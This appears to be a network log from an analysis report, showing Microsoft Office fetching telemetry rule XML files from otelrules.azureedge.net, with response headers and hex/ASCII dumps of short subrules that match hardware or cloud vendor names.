                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:33 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:33 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 472
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                  ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                  x-ms-request-id: 00606c4f-d01e-0014-08c3-3bed58000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134733Z-15b8b599d88qw29phC1TEB5zag00000002y000000000dhde
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:34 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  82192.168.2.44987413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:33 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:34 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 432
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                  ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                  x-ms-request-id: b3049c5e-001e-0082-330c-3d5880000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134734Z-178bfbc474bgvl54hC1NYCsfuw00000004f000000000d38e
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:34 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  83192.168.2.44987613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:33 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:34 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 427
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB464F255"
                                                                                                                                                                                  x-ms-request-id: 3d26e0c5-e01e-0020-6638-3cde90000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134734Z-178bfbc474bpscmfhC1NYCfc2c0000000350000000007s20
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:34 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  84192.168.2.44987713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:34 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:34 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 474
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                  ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                  x-ms-request-id: f000c210-c01e-008d-4155-3c2eec000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134734Z-15b8b599d88vp97chC1TEB5pzw0000000320000000003ha6
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:34 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  85192.168.2.44987513.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:34 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:34 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 475
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                  ETag: "0x8DC582BBA740822"
                                                                                                                                                                                  x-ms-request-id: 5c8e7bca-d01e-0049-4f4b-3ce7dc000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134734Z-15b8b599d886w4hzhC1TEBb4ug000000034g000000003phn
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:34 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  86192.168.2.44987813.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:35 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:36 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 419
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                  ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                  x-ms-request-id: a5f5ebba-f01e-003f-29f6-3cd19d000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134736Z-178bfbc474bv7whqhC1NYC1fg400000004hg000000008t9d
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:36 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  87192.168.2.44987913.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:36 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:36 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 472
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                  ETag: "0x8DC582B984BF177"
                                                                                                                                                                                  x-ms-request-id: 80be2a3e-601e-003d-77f5-3c6f25000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134736Z-178bfbc474bh5zbqhC1NYCkdug00000004e000000000c0w4
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:36 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  88192.168.2.44988113.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:36 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:36 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                  ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                  x-ms-request-id: c8277487-201e-0051-68a5-3b7340000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134736Z-15b8b599d889fz52hC1TEB59as0000000310000000005yy1
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:36 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  89192.168.2.44988013.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:36 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:36 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 405
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                  ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                                  x-ms-request-id: ce292e58-401e-00a3-2e0a-3d8b09000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134736Z-178bfbc474bfw4gbhC1NYCunf400000004n0000000003egv
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:36 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  90192.168.2.44988213.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:36 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:36 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 174
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                  ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                  x-ms-request-id: 6f884587-b01e-0001-3155-3c46e2000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134736Z-15b8b599d882zv28hC1TEBdchn00000002yg0000000061ra
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:36 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


